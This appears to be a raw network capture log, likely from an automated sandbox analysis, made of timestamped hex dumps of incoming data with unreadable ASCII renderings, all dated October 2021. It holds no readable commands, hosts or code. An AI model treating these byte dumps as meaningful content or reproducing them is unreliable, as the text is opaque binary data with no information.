                                                                                                                                                                                2021-10-19 05:23:31 UTC1212INData Raw: 05 b5 87 e6 c4 b1 0c 2c 57 cb 1e 25 b7 92 54 28 e5 f4 eb 4d c3 aa 09 11 ae da dd 26 76 73 08 0c 84 63 34 12 0c 61 7e 36 40 24 a4 01 2c ef c4 14 1d 7e dd 98 dc 80 09 bb 45 4a 1c 80 f5 0b a5 e4 cf 70 19 34 cf c4 51 e7 88 8c b9 0b 01 29 49 d5 28 ad a7 03 80 07 0c 83 00 98 f4 fb 31 55 df 72 1a 60 db 14 c1 9f f9 a0 5a 6b c8 ec b1 2f 55 17 00 2f 12 40 d9 9c c7 6f 70 6d b9 f7 66 84 1c bd ea 31 58 88 12 e2 30 61 c8 1f ae 94 b6 3a 1b 2e 14 b4 ac 51 72 15 bf c6 4b 63 03 dd e5 a6 c1 c3 dd e2 84 09 b8 d4 b4 07 aa be 68 0b ec 39 f0 72 51 80 49 2e 0b e6 69 8c a6 0d 0d 15 38 16 c2 b0 17 65 ae f0 81 73 03 47 ce f3 1e 40 b0 06 12 17 fb 20 34 2a 07 ea ab 7e 86 61 ef 8f 56 de 52 2d e4 38 f1 27 a7 bc 80 05 4c 67 dc f9 95 59 d6 82 0e ee aa 58 02 cf 23 00 b1 dc 06 bb 5e ff 0b
                                                                                                                                                                                Data Ascii: ,W%T(M&vsc4a~6@$,~EJp4Q)I(1Ur`Zk/U/@opmf1X0a:.QrKch9rQI.i8esG@ 4*~aVR-8'LgYX#^
                                                                                                                                                                                2021-10-19 05:23:31 UTC1228INData Raw: 83 20 1b 29 01 aa e7 17 8e 95 14 30 24 ec c0 60 d5 48 80 ff 5d 40 0c 2d a9 dd 4e 36 c4 e6 25 00 eb 26 1e 97 44 82 fa b9 6b 6c a4 00 62 99 07 78 b8 62 d2 99 57 32 44 02 0c 25 0a 1a 43 48 c1 1d f6 ab 71 c2 33 4a 3c 8b f8 b4 60 60 09 1c 24 57 9a 12 ca f3 a5 f0 98 c6 4c c4 50 82 5f 9b 8a f5 80 38 c9 3d f0 5b 01 ef f4 df 8f dd d1 7a 89 26 87 e1 44 30 60 f9 3e bf 1b 32 92 c5 18 65 b6 d5 c9 ef 02 d9 4e cd e7 d2 5e 20 f3 cf 1b d7 f9 c3 0d 01 1c 5a 86 16 fb 7c 95 89 14 93 3d e2 c4 80 50 dd db 5c 0c 95 86 c0 91 32 f5 8c ac 99 f5 c9 f6 0e eb b6 2e c4 2c b5 9c 26 25 c8 16 77 04 52 80 c1 44 cf 24 8c 44 08 c0 38 28 07 03 e6 49 2c a3 39 43 a4 b1 1c da 64 6a f1 01 94 2b 3b c5 91 e8 bf 24 92 e0 2f 43 60 a7 88 26 06 44 3d 03 2b f5 a0 6a f8 63 00 68 51 1c fa 8a 76 6b c1 bc
                                                                                                                                                                                Data Ascii: )0$`H]@-N6%&DklbxbW2D%CHq3J<``$WLP_8=[z&D0`>2eN^ Z|=P\2.,&%wRD$D8(I,9Cdj+;$/C`&D=+jchQvk
                                                                                                                                                                                2021-10-19 05:23:31 UTC1244INData Raw: 56 b1 52 8e 18 14 88 18 43 e6 91 05 1e e9 db 3d cd 92 77 cb 74 58 88 2e 2c 03 32 20 6c 34 00 14 89 ea d6 73 1b b7 e7 0e c4 c9 e8 55 4e 3f 14 90 19 74 c0 f4 8c 30 d6 54 f4 aa 4e 7a c2 ab 2e d8 7c e0 eb 48 2b 4b 37 72 84 13 47 21 00 75 89 b6 e5 3f 24 8b e8 09 1d 9c ee 69 f2 fe 03 22 72 35 4b e3 e6 2c 13 a7 ae 80 73 b4 c1 b8 fb 2f 49 40 74 00 c2 0f e0 55 75 67 28 69 ef f3 c0 b5 1e d1 30 ea d9 14 cb f0 23 09 5e 4a 6a 07 d3 26 01 5f 9a 48 d7 da 28 d8 0f ca 54 e6 52 06 38 ba 7b 84 20 e0 bc 0b 09 34 2d 54 83 71 6f 5d 18 14 5c f1 08 87 fe 17 20 52 69 ab cc 68 62 60 1f 44 0f 9a b4 29 a0 84 2c 82 58 08 a9 86 b7 3e 7a 50 13 99 e3 99 c2 8e 15 7a e2 7c b0 be 03 77 8b 30 40 98 11 08 03 85 22 39 99 15 e6 70 2e c1 01 20 b2 16 56 c6 aa 80 10 85 91 e6 af de 5e 4d 02 f1 78
                                                                                                                                                                                Data Ascii: VRC=wtX.,2 l4sUN?t0TNz.|H+K7rG!u?$i"r5K,s/I@tUug(i0#^Jj&_H(TR8{ 4-Tqo]\ Rihb`D),X>zPz|w0@"9p. V^Mx
                                                                                                                                                                                2021-10-19 05:23:31 UTC1260INData Raw: 17 4e 82 ba 32 78 1c 57 a0 ae 54 ad 60 55 00 5e 73 c1 ed b8 0b dd 2e 60 78 22 94 19 bf 11 5b fe ed f8 c0 4b 99 0e bd 64 09 87 1d 7c f3 22 88 7f 0f 82 12 b9 ee 80 06 06 9f 53 85 18 f9 22 50 5c e7 3f 33 c7 73 0c 8c 80 71 4e 9c 0c 92 72 44 df 6c 68 70 13 12 83 56 fb 43 61 bc dd 80 02 11 11 b3 02 6b 94 48 21 3b 69 60 66 6c 33 64 19 c7 10 1c da 89 18 3c cb 0b 42 b4 d8 54 32 a8 f5 03 3e b8 55 02 15 2b 06 3c db e2 a0 d2 0c 58 d7 bc 13 32 1a 41 a5 f6 0c b1 b8 80 48 70 ac 9e c6 cb 23 cb ed e7 2c fc 5e 50 a2 7c 07 eb 9f 82 8f bd e8 2a 60 28 5b 96 fb 01 a6 c1 ba 32 0e cd 77 8e 10 f0 b3 a5 d5 ae 30 b6 cb e1 21 5f dc 40 f3 99 85 f7 5f b3 95 05 5e 68 40 be 39 be f6 8e f2 c3 8a b9 43 5d 98 fa 8f 90 c0 28 d9 ac 2f 35 da 25 88 83 83 83 bc f2 89 3a a7 d0 68 21 92 ea 2c 0f
                                                                                                                                                                                Data Ascii: N2xWT`U^s.`x"[Kd|"S"P\?3sqNrDlhpVCakH!;i`fl3d<BT2>U+<X2AHp#,^P|*`([2w0!_@_^h@9C](/5%:h!,
                                                                                                                                                                                2021-10-19 05:23:31 UTC1276INData Raw: 56 65 87 79 11 5d a0 46 02 b1 84 d5 86 d3 cb 62 b8 5b 5e f6 0c 47 ed 92 c5 ad 11 16 12 f9 b2 c0 52 e2 36 9b 0b 85 3e 77 e4 e0 8e 48 82 b1 72 24 03 04 f6 fa c6 ac 80 76 b8 c9 c0 0d 04 03 dd f7 02 5f 6b 4e e8 43 f7 10 9d ce 19 0a d6 28 5b fe fa ad 2d 19 a0 40 ef 2c 31 fa 6b 52 0e b0 03 3b 26 6a ea a3 7d 7a 4e cd c0 fa 1f 30 fe 49 0c 85 2f 88 86 4b 85 09 18 79 e5 e6 1c ca aa 5f fe b2 8c 18 ee 20 80 b2 38 03 36 95 44 fc ea 62 01 14 69 02 de 6b 91 c1 80 8e df 70 2d d2 cd d5 06 21 bf 86 c5 c6 41 09 e9 27 f5 6e e8 d9 5a ac 51 a6 94 b8 06 18 b0 17 8a fa f3 09 7b 5c a0 28 07 52 9c 02 bb 90 86 86 dd 90 60 aa 30 a1 96 09 98 0b 4f d2 f0 7a 2f 37 36 cc fe f1 4c 4c 6e 10 eb 04 03 39 dd 97 46 8f 00 0e a2 47 69 0a 9d 55 30 c9 12 09 0c 30 3a d6 30 72 ad 0d 08 dd ba 0a c6
                                                                                                                                                                                Data Ascii: Vey]Fb[^GR6>wHr$v_kNC([-@,1kR;&j}zN0I/Ky_ 86Dbikp-!A'nZQ{\(R`0Oz/76LLn9FGiU00:0r
                                                                                                                                                                                2021-10-19 05:23:31 UTC1292INData Raw: a2 13 94 e8 23 16 30 27 05 80 68 dc 68 66 35 0e b3 40 00 0a 6b 99 51 a0 23 01 cb a8 79 93 16 2a 1c 80 3c c8 9a c4 61 d6 af 0c 53 65 d4 2e 98 38 5a 97 54 be c7 03 e8 bd a8 51 a9 00 36 b0 3b dd 3f 33 02 f7 33 d7 ff 16 e4 00 09 15 48 80 da a3 dd 98 60 08 48 f4 b8 2d 94 25 be b7 a5 58 1b c1 e1 50 26 01 0e 47 80 08 84 aa 59 be 37 3c 60 73 12 45 07 a7 d4 18 e2 b8 3d 15 14 83 76 79 31 ee 4f b0 07 ed 9d 18 41 c3 ea ae 74 8f 84 cc 1c d7 4b 17 81 b5 23 b8 52 d1 ba 7f 44 18 f6 be 4a 50 80 b2 13 32 83 05 77 bb 1f 1d a5 a0 cb 04 3f 9f 1c 6a 47 3b 2d 59 f8 82 36 fb 04 20 00 e3 85 05 34 7b c8 1e d3 eb 1a 4c 7e 10 46 0c 98 82 17 77 fd dd ac b4 30 da 8e b2 af 8e 60 5c 12 09 68 67 d0 6a 83 5a 66 87 01 72 9f a9 2e 8f 46 e6 49 50 01 92 e7 b0 9d bc 73 59 82 41 27 32 96 80 84
                                                                                                                                                                                Data Ascii: #0'hhf5@kQ#y*<aSe.8ZTQ6;?33H`H-%XP&GY7<`sE=vy1OAtK#RDJP2w?jG;-Y6 4{L~Fw0`\hgjZfr.FIPsYA'2
                                                                                                                                                                                2021-10-19 05:23:31 UTC1308INData Raw: 5c b0 14 d3 45 07 7f 71 e8 eb 90 02 4a a5 83 49 10 c3 82 ca 68 13 f1 3e 79 9b cc 6c ab 20 2c 60 58 0e 34 01 04 2f cf 0d f8 00 1c 28 8a 6a d4 be ca 06 f4 13 c2 20 7a 3a 00 7c bd 48 88 73 f1 09 4b 04 79 33 a8 fc da ac c8 0f c9 42 ff 77 c4 61 bf 24 d6 c0 3d 1b 77 26 38 aa 86 2f d6 61 0a 5a 8d a3 90 04 cc f8 f0 fd 95 8f a6 06 dc 89 41 13 3d aa 2e e0 f2 92 02 e8 c8 e6 79 1a b4 50 32 0c 8f 87 64 03 0c 13 92 9a 27 ab 0d 00 63 e9 54 dd b3 3e 5d 51 09 41 aa 70 58 64 00 76 e6 c6 65 b8 75 96 74 e1 3b 22 dc 54 c0 26 51 8b 25 58 24 83 f0 8d 7a 4a 5e 06 a5 ec 53 aa 1b 7c 6f e9 0d 05 1e 4d f2 b2 4f a1 15 c0 68 c8 30 05 2e 11 94 13 1b 31 9c 92 52 1d 51 2c ea 03 ea 2f a7 75 de c8 fc 97 29 42 0d 38 80 06 b7 76 1b e0 10 02 77 03 94 b2 35 4a 00 c4 6f 85 d8 b7 a0 ae ef c1 e7
                                                                                                                                                                                Data Ascii: \EqJIh>yl ,`X4/(j z:|HsKy3Bwa$=w&8/aZA=.yP2d'cT>]QApXdveut;"T&Q%X$zJ^S|oMOh0.1RQ,/u)B8vw5Jo
                                                                                                                                                                                2021-10-19 05:23:31 UTC1324INData Raw: d1 76 ec 06 04 bc ae 0d 00 59 5b d7 ed 99 f5 4c 3d c6 44 c0 b9 80 e0 8c 34 b6 bd 0f 0d a6 a7 20 f4 aa 9c bd 4b 4d 34 12 75 06 c2 d0 19 f6 66 12 d3 b0 4c bf 39 3b 83 76 10 35 2c 6b 38 7e 17 12 9e b2 3d 19 10 03 2e 13 cc 07 54 97 44 5b a1 9a 14 01 5e 70 8b 18 fb 53 f1 c9 bf 00 4f ec 68 06 1d 0b 50 03 ab 5c e6 66 ae 7b 05 22 38 1a 57 da ec a2 01 e3 b1 82 f3 1e 02 2f 06 8f ef a0 08 79 a4 2f dd ec 40 2b 7e a8 18 7f 43 58 0e d0 04 07 29 1d 10 8f f0 61 40 57 25 9f 82 93 97 53 41 e8 03 dc 4b cd e2 46 55 18 66 fb 32 47 43 01 95 80 75 4a 4c 7f e0 09 3e 78 13 8e a2 61 2b 81 f4 39 00 b5 f5 a0 0f dd cf 5a 62 31 c9 36 7c c2 10 2c 52 26 32 63 91 c2 d9 76 a0 11 59 10 5a 3b 80 5e 2c 06 2d 42 da 6a a6 86 83 be 87 fb 40 65 ed cf 16 5e 62 f4 f8 aa 28 98 0b 12 a9 fa fc 06 56
                                                                                                                                                                                Data Ascii: vY[L=D4 KM4ufL9;v5,k8~=.TD[^pSOhP\f{"8W/y/@+~CX)a@W%SAKFUf2GCuJL>xa+9Zb16|,R&2cvYZ;^,-Bj@e^b(V
                                                                                                                                                                                2021-10-19 05:23:31 UTC1340INData Raw: 13 6b d5 6a 44 77 74 8a ae bd 9c 8c 65 1c 9f 06 9d 6b 61 1c 56 80 2f 59 39 dc 5f 06 bc d0 74 74 02 1f 0c f2 da f7 21 a2 a8 7a 37 70 6c 05 28 0d bf 90 48 b8 eb 03 89 87 f3 14 74 80 76 4e 46 77 11 04 4c 85 fb 5a ab fa 8c d8 1f 3c cf 5f 40 d8 bc a0 03 a8 9c ac 75 3a 4c fe 0c 1a 43 ad 11 dc 09 b7 97 10 70 c0 3e 4d cf 03 66 60 8c 85 a1 72 d5 e1 e8 f0 d5 32 18 b8 a9 a8 28 e0 87 2f 03 25 5f 87 83 1e ac 50 5d 62 98 88 62 fb c8 50 6c 52 25 dd f0 82 de 21 61 41 5b af 92 46 8f 08 9f e9 19 f1 20 f5 2b a1 b6 b8 26 28 ca 04 04 e8 be 96 52 02 bc 0a 00 0f f1 6f a5 ab 0c 8e 24 b9 a9 6e 83 86 ae 22 cc 12 95 13 07 80 08 c3 e8 7a 80 1b 25 09 dd 93 1d 03 23 c2 90 d8 7a 08 06 9a c7 d4 2e be 9e 04 3f 01 b0 ac 0e f0 9e 73 30 47 d2 5d 04 fd 24 69 b6 e4 7f 70 9a 88 bb 7c 38 2a 83
                                                                                                                                                                                Data Ascii: kjDwtekaV/Y9_tt!z7pl(HtvNFwLZ<_@u:LCp>Mf`r2(/%_P]bbPlR%!aA[F +&(Ro$n"z%#z.?s0G]$ip|8*
                                                                                                                                                                                2021-10-19 05:23:31 UTC1356INData Raw: b5 36 73 62 e8 ba 89 14 df 01 90 05 8c 49 cf 6c 93 63 5e f8 33 ba 70 56 6a 1e 97 81 e1 53 48 92 83 fd b8 3e c8 ee d4 04 6a e5 dd f4 98 91 6e 9a a1 d7 b4 44 b2 3e bb a4 77 34 12 86 2f 2a aa 88 eb 5f 43 09 04 84 8d 10 2a a3 c2 02 c4 f5 17 ca 3b 74 1c 02 71 04 1e 95 e1 06 da c6 50 2c 30 c1 17 1e 18 de a1 12 b4 47 a2 80 78 6f 40 a5 32 d6 c2 6b cd 8e cb 65 5c 21 e4 d6 41 b4 1c 09 0f da 07 c3 eb 04 e1 fb 82 6e ce 48 08 a1 c2 e0 81 ee 6b 17 a5 08 a4 42 c1 2f 5a c6 d0 2c 02 09 cc d7 f7 5e 10 8c 60 66 a2 25 23 50 80 d4 a3 8c a6 b1 31 e2 0d 20 bc 51 80 18 09 30 ab 4f 02 cc 28 e9 21 20 12 fb 3d 5d 47 58 28 3c 10 3e 69 52 07 c0 36 22 72 9e c8 a1 77 ed 0b 15 23 ec c0 74 6a bf 8c e5 bd b9 10 6a 3f 73 36 86 e0 c4 1d b6 14 0e 43 9c f4 9d 37 a0 a2 36 02 51 ed b0 f9 68 58
                                                                                                                                                                                Data Ascii: 6sbIlc^3pVjSH>jnD>w4/*_C*;tqP,0Gxo@2ke\!AnHkB/Z,^`f%#P1 Q0O(! =]GX(<>iR6"rw#tjj?s6C76QhX
                                                                                                                                                                                2021-10-19 05:23:31 UTC1372INData Raw: b0 00 72 9f d9 34 0d 2e c1 17 c3 f9 dd 56 50 d6 a7 18 3e 90 94 6e b8 10 e0 b1 f7 91 ee 98 28 e6 e4 86 5a 64 c0 9c 01 9a b7 16 76 25 81 40 93 a5 47 12 ca 9e 4b d8 01 5d c5 be 22 41 42 4c ef 40 49 54 b3 2d e6 32 00 7b 4e a4 d4 39 76 fb a2 d0 5f c0 bb 5d c4 4e fa 8c 33 e6 60 1c 54 1b 45 c6 d3 92 1e 4a 65 8c 4a 53 3d 38 4a 60 1c 6d bd e3 c1 04 ac d4 63 e5 e2 f8 8e 30 d3 09 99 a8 48 0c 08 66 22 fb 6b bd 2e b5 be 3d 18 11 53 5a aa 17 29 f6 f7 20 00 d1 73 92 be 88 03 66 46 c5 8e 80 bb 9a a5 05 83 37 02 e0 5f 85 8d 40 de 5a 2a 3e 6a 77 c1 11 9c d7 ac 57 ba 5e 4e a0 7c 2e 01 e7 67 2d be 1e 1c af 34 9e 45 4f ca 03 42 8d c3 ac 01 19 20 97 b9 6f 83 7f 6c 01 cb 45 8e 06 17 25 f4 ef 91 a7 08 05 2a 25 62 13 69 40 46 76 5b 57 6d 85 73 5f 09 f8 e6 52 3f 5d 71 16 97 05 41
                                                                                                                                                                                Data Ascii: r4.VP>n(Zdv%@GK]"ABL@IT-2{N9v_]N3`TEJeJS=8J`mc0Hf"k.=SZ) sfF7_@Z*>jwW^N|.g-4EOB olE%*%bi@Fv[Wms_R?]qA
                                                                                                                                                                                2021-10-19 05:23:31 UTC1388INData Raw: 02 dc b0 20 96 3f 3e 77 c4 8a 03 6f 14 2e c6 ef 54 04 36 c0 f1 09 50 a4 da ca 4e cd b8 14 c6 99 24 0c 1c 6d 94 3d 18 28 83 bd 87 0c 15 f6 cb 34 10 d4 05 03 19 1c 1a 55 90 2f 63 31 29 c9 1c c8 c4 d8 09 83 df e0 2c f4 36 6c 0c 6e 97 5e 29 8c ad ba 14 3c 4f d6 d0 d4 bd 0a ee 51 d4 08 01 fa e9 eb 51 09 97 27 20 3f e0 81 44 60 e3 98 60 8f 11 d6 ad 1a 07 0b 58 d5 f2 b8 71 b0 a6 e8 45 4b c1 51 8d 69 7b 1a c6 14 60 f1 c0 bf 7f b6 92 b0 10 fb e0 76 13 7b f1 67 fa 03 c4 d7 7c 1d 05 99 70 34 c6 0e 02 34 81 4f b4 f8 23 05 64 04 a6 58 a2 a0 74 ae 0c 94 87 af ad 21 d4 01 f3 d0 58 d9 9f 36 5b 65 51 68 de 80 7f 93 86 b0 5c 60 53 30 c5 5b 05 d8 07 3c df cc 50 03 03 10 0e 03 1c 21 13 e0 24 40 a9 dc 9f 32 55 02 d5 2c 4d 90 ba 44 f8 0b 32 1a 13 e3 50 b0 1c d5 36 0c 0a de f8
                                                                                                                                                                                Data Ascii: ?>wo.T6PN$m=(4U/c1),6ln^)<OQQ' ?D``XqEKQi{`v{g|p44O#dXt!X6[eQh\`S0[<P!$@2U,MD2P6
                                                                                                                                                                                2021-10-19 05:23:31 UTC1404INData Raw: a9 1d 81 fd 1e f0 e9 6a 97 96 27 88 06 ed 13 90 a0 65 6d 18 23 90 28 0d 34 4f 25 60 56 e0 9e c4 24 05 c2 1e d8 91 c1 bc 21 38 7e 0c 5b 1f a6 11 f5 4f 76 88 c0 02 3a c6 06 09 7e d8 7a de 8c 9f e0 2a dc f6 15 f3 89 2f f9 f5 5f e8 91 a0 cc 1b fd dc a1 62 80 fe b5 34 00 f4 19 20 07 63 76 78 b3 54 2c e0 af 12 b7 8a ca f5 01 93 04 45 a0 0b 6f 09 a2 11 64 2a 5a 50 90 f9 4b 0f a0 ee 90 4a dc b3 32 0c 5b d0 0c 93 17 16 aa ca 54 4a 5a 0e 6c 01 e8 10 22 93 b4 81 1d 65 c0 d4 a0 3b e0 91 b1 79 ae f8 16 80 85 f8 00 be 32 aa 1d 2f bf 1c 34 24 b7 e9 66 97 c2 e3 b6 10 7c 5f 07 dc 67 2f 8c 3d 1d 2c 56 2e 80 60 0c 9a 3f 0e 02 7c c7 20 f2 d2 09 e4 b3 16 57 f8 00 1e 48 2e 5a 0b 6b bc d8 d3 06 f1 f3 1e 9f d6 0e 00 66 89 2a 4c d4 7e 4d 41 07 10 f8 eb 3e 2f 03 3a d8 05 b8 4b 60
                                                                                                                                                                                Data Ascii: j'em#(4O%`V$!8~[Ov:~z*/_b4 cvxT,Eod*ZPKJ2[TJZl"e;y2/4$f|_g/=,V.`?| WH.Zkf*L~MA>/:K`
                                                                                                                                                                                2021-10-19 05:23:31 UTC1420INData Raw: 2b cb 28 16 58 33 1e b6 f9 74 77 34 52 ee ec 78 a8 0c 3e cc bc c2 a7 df 18 3a 08 f0 b9 11 97 a4 bc 04 a8 22 eb 7c 04 c0 27 7a 36 3f 0b b0 8b 1f 13 f7 48 7a e9 3e c0 32 28 df ea dd 9e e0 aa 00 a4 b2 bb 50 c7 92 e9 a8 4e 21 f0 7a bd b7 0f 48 43 a0 9d 19 1c 0a 16 13 b8 01 35 d6 62 8e 9b b2 8c 83 68 38 64 18 36 30 65 0d 1a 4e bd fe c8 99 59 71 5e 18 f2 9c 82 22 65 c1 4c 64 ba 1c 93 8a 09 9e 2f a0 2e 37 7c 57 41 25 af 01 53 4c 04 11 e5 9d 43 fd 22 05 7a 20 7c 5b 0a 21 4a fc 81 9e bb 1c d0 83 25 53 6c 47 f5 de d0 c1 01 7b e1 61 d0 f7 83 ee 92 02 e7 15 d4 c2 81 a2 7e 64 01 d5 0f fb 72 c1 f9 10 78 ee 0b d7 14 3e 56 80 45 a5 90 5d 0b 9a fc 16 64 bd 20 80 4b 36 92 21 c0 0d 18 dd 03 66 fa 1c 7f cc e7 70 4c 84 01 1d 0b 92 15 87 37 29 c8 57 ae f2 a3 5d a3 0b 0a 0a b9
                                                                                                                                                                                Data Ascii: +(X3tw4Rx>:"|'z6?Hz>2(PN!zHC5bh8d60eNYq^"eLd/.7|WA%SLC"z |[!J%SlG{a~drx>VE]d K6!fpL7)W]
                                                                                                                                                                                2021-10-19 05:23:31 UTC1436INData Raw: 23 c1 05 20 3f 90 22 d8 50 c1 0f 36 6c 9f 12 67 3d 01 0b e1 83 e6 2c 80 34 b3 ec 82 48 66 7f 98 aa 3f f4 4f 80 8a 21 cb 28 04 5c 4d c2 28 1c c6 2e 78 a4 07 a4 a0 1d 46 22 e0 74 6a d4 06 82 40 36 3e ae 4a c6 05 e4 28 6c 16 4c 05 e4 f7 25 5c 09 3f 08 d1 a6 ba 18 e9 aa 47 23 80 b2 28 01 c1 3c 02 a5 f7 74 53 82 16 d9 33 70 b0 e8 d7 4e 88 0c 93 1c de b6 ed 16 10 6a 4f 64 05 d3 23 14 ec 00 fb 5e eb 1c 91 2e 79 bf 49 08 85 07 e0 70 01 c5 78 03 e3 c7 9a 22 83 c3 05 10 91 ca aa ef 41 fa 7a 74 e5 cb 3f d0 aa d5 68 60 d4 0e 4f 06 17 2c fd ed 6c 01 12 92 bb fa a2 5e 89 34 d8 0f 14 33 37 93 a8 10 48 0d 04 94 ff 0b 82 f4 68 ce 60 4a 18 59 c1 76 af 3e bd 07 b0 a9 14 b8 f4 80 24 95 81 d6 24 24 8b 68 9e f2 e4 58 e8 ce 4c 1e 60 11 da ee 9b e0 60 14 0e 75 40 f7 0f 40 81 fd
                                                                                                                                                                                Data Ascii: # ?"P6lg=,4Hf?O!(\M(.xF"tj@6>J(lL%\?G#(<tS3pNjOd#^.yIpx"Azt?h`O,l^437Hh`JYv>$$$hXL``u@@
                                                                                                                                                                                2021-10-19 05:23:31 UTC1452INData Raw: 49 53 fb cd 1e bf 39 c0 0e b8 25 ac b0 87 9e 8a c2 0a 0d d0 b8 05 ad 24 72 20 e2 b1 8e e1 0f 60 45 f4 4c 7f ac 2c 6b 46 27 c1 b4 d5 c0 46 56 30 58 03 3c cc 63 fa 28 66 9a ec 13 83 65 cd c9 84 c1 eb 2b d8 1c 3e 06 1b 6b 40 ad 35 10 91 c0 38 10 69 d9 11 4f 0f 02 dd da 4b 60 ad f8 e4 5e ae 13 fc 02 ca 4f d5 90 e8 54 c4 dc 0c 91 62 53 c0 de 9e 05 61 e8 d5 ec fc d6 30 09 27 11 dc 48 d1 8e 5c bd a0 d6 e7 9f bd 43 4a 8d a8 b2 c7 e9 97 0a 11 02 b4 01 b9 cf 00 40 08 9a 03 00 46 a3 b3 52 cd b7 1e 85 59 ae fd 71 c3 26 64 03 dd 06 3e f4 db 10 a4 1e 39 0f 73 3a 2a 7e 4a 48 80 fa e9 c9 85 96 74 07 6a 25 1a 0f 85 13 18 ac 84 06 4c 26 14 a9 2c 01 a4 66 10 3c b5 0c 35 32 8c 14 75 50 06 4f e0 d8 ba 9e e3 20 b4 18 4f 0b ca 11 55 dc 19 fa e2 10 e7 cc c0 68 ac 30 66 48 6c 24
                                                                                                                                                                                Data Ascii: IS9%$r `EL,kF'FV0X<c(fe+>k@58iOK`^OTbSa0'H\CJ@FRYq&d>9s:*~JHtj%L&,f<52uPO OUh0fHl$
                                                                                                                                                                                2021-10-19 05:23:31 UTC1468INData Raw: f4 9a 33 37 64 01 8b 18 43 5c e4 26 09 74 c2 4a 05 77 57 ca 20 5c f3 01 d4 9f d2 94 54 28 50 1e 5f 6c 58 6b 45 0b 07 2e 02 4a 04 4d 4d 84 1a e8 cf 12 ea 90 23 0d a0 69 5a 14 00 b2 42 74 e9 cb 7c 95 f2 42 4f df cc c0 9a 9f 58 66 20 bc 28 4e d0 04 4a 78 26 03 bd af 4a 5e 5e 01 42 f8 d2 6e 92 40 20 e8 a1 96 18 65 e9 66 10 c4 f1 00 a2 d7 a9 70 de 8f c5 21 1f e5 11 2c 67 e8 20 f5 fa 6e 3d 86 00 74 66 d4 49 f9 e0 6e 18 a4 ec 5b 80 8b a3 31 5e f4 30 9d 12 2a bf 31 18 15 78 6c 30 0e fe 5e a6 c9 28 a0 e3 a9 5d 04 d6 16 e2 22 be b0 d0 f4 50 8d 1e 25 02 59 58 d5 cb 11 8c f6 ec 00 2b 10 54 d8 67 5a 01 74 2f b3 79 1e 45 cb 28 29 18 c0 15 94 ad 35 4a fa 21 f0 2e 0a 52 ce e6 e0 ee 2f 04 80 53 fe 03 6a 31 71 0e 5f 8f e0 2d b1 20 04 ca cd 0c c5 6c 93 05 76 81 bb ef c4 39
                                                                                                                                                                                Data Ascii: 37dC\&tJwW \T(P_lXkE.JMM#iZBt|BOXf (NJx&J^^Bn@ efp!,g n=tfIn[1^0*1xl0^(]"P%YX+TgZt/yE()5J!.R/Sj1q_- lv9
                                                                                                                                                                                2021-10-19 05:23:31 UTC1484INData Raw: 58 38 09 14 4f d2 c2 8c f6 d0 6d 05 dd 35 83 76 6c a0 8e 86 2c c2 92 a8 8b fa b3 55 18 68 58 7d 0c 4d da b0 07 44 7b 05 6e 01 f1 4e 3b 91 c0 ad 65 71 36 64 69 6f 00 a3 13 cf 49 2a 08 88 50 18 de 2e 90 2c f2 1b 0f d0 62 10 ab 89 06 56 1c 61 ac 8f 13 c5 d4 f1 4a 28 b8 1e 48 2b 3b ac e1 0c 82 5e d7 83 1a a1 be 3f 1c 72 40 20 82 f8 17 18 76 c5 9e 3c b7 51 0b 40 eb ec 04 04 82 2e bc 1c 2d 6c 60 a4 df d1 00 e3 77 d0 45 5b 81 92 17 fb 63 b3 02 d4 ca 3b 99 b1 06 c7 18 30 b5 f1 0e a4 63 08 b6 c5 03 d1 d5 7a 27 05 94 d0 01 93 7b c2 60 61 64 11 37 76 83 0b 02 4c 8f 5d 4e 96 18 c1 27 76 20 86 d2 20 fe 5f 7a 50 c0 54 b9 bd 1c 71 0c 76 36 0b 0d b6 02 66 70 58 13 08 53 ac 46 af 52 7e 14 1a c1 e5 46 45 80 96 f8 ab 2a f2 31 0a 4b 87 a7 ac 7e b9 af 8c 2b 1a 44 4b 58 be 24
                                                                                                                                                                                Data Ascii: X8Om5vl,UhX}MD{nN;eq6dioI*P.,bVaJ(H+;^?r@ v<Q@.-l`wE[c;0cz'{`ad7vL]N'v _zPTqv6fpXSFR~FE*1K~+DKX$
                                                                                                                                                                                2021-10-19 05:23:31 UTC1500INData Raw: 76 5a 30 eb 00 1a 31 03 dd a8 6a 18 6c 65 d1 38 44 2e c1 1c 97 47 1a 3f bd 30 87 0e eb 62 ac 2a 48 1f 21 44 de 15 e3 a0 a8 a7 25 a9 10 e4 dc 04 e4 3e 38 96 2a f0 b9 6a 07 b0 76 78 18 22 30 6e ae 56 fc a9 c8 0b 41 e2 0d 05 82 2d 99 ce 66 f8 80 26 6d f3 12 80 9d a0 9e bd 58 1a 77 be fb 6b 06 6e d0 12 01 a0 c6 4a 83 dd 56 a8 3e f3 34 7b 2d 20 ce 80 5c 4b 6e 1c dc a3 10 ba 13 e4 62 24 ef 2d 4e 00 76 22 8b e6 92 ba 28 54 f7 90 09 9e 12 c3 53 43 ad f8 84 7d 5c 61 2f 38 70 44 4e f1 06 7b 01 0c 12 5d bf 93 e4 14 be fb 7b 49 f6 64 a0 82 1c 90 07 15 a0 42 b9 fe 72 b1 5e d4 c0 76 c3 de 4e b9 ec 81 3e a6 ee c9 d8 7b 00 fe 45 90 84 38 12 e1 04 aa c1 71 b1 4d 61 95 80 42 e6 94 01 60 ed e1 30 15 d0 17 cb 62 0a c0 ef f9 f1 3c f4 22 06 df fa 64 ee e1 e8 50 70 e2 48 01 56
                                                                                                                                                                                Data Ascii: vZ01jle8D.G?0b*H!D%>8*jvx"0nVA-f&mXwknJV>4{- \Knb$-Nv"(TSC}\a/8pDN{]{IdBr^vN>{E8qMaB`0b<"dPpHV
                                                                                                                                                                                2021-10-19 05:23:31 UTC1516INData Raw: 80 4f 3b 46 c0 11 57 e4 64 8e d3 31 fa 73 36 2b 7d 2b f9 b8 2d 55 60 72 1e 20 1d c0 6a da 30 ab 64 b3 61 bf 22 4d 9b 82 80 62 ae a0 f1 94 28 d7 cf 46 0c fa 4b 40 fe f4 92 5d 45 e7 7e 00 76 f8 2c 23 44 7d 91 22 b0 ae 00 47 cc 81 73 e3 bf 83 cb 4e 12 00 28 b5 58 08 05 de 48 80 f4 60 6c cf e2 6c d5 60 2c 0e 38 c0 8c 58 95 54 36 a4 f6 13 ec 40 79 3c a3 83 10 e2 ba fb 04 bf 0f e9 4b b2 87 3b 51 96 68 15 c0 02 74 05 d1 c9 20 cb d7 e8 30 06 8d d9 b5 85 38 98 4a 0a 26 17 54 fd c2 00 59 f5 3a 02 5e 67 82 20 9d 6b 17 be 96 be 6d 44 03 bc 27 01 5a 25 b8 40 46 62 29 1c 30 0e b3 55 87 7e 2f 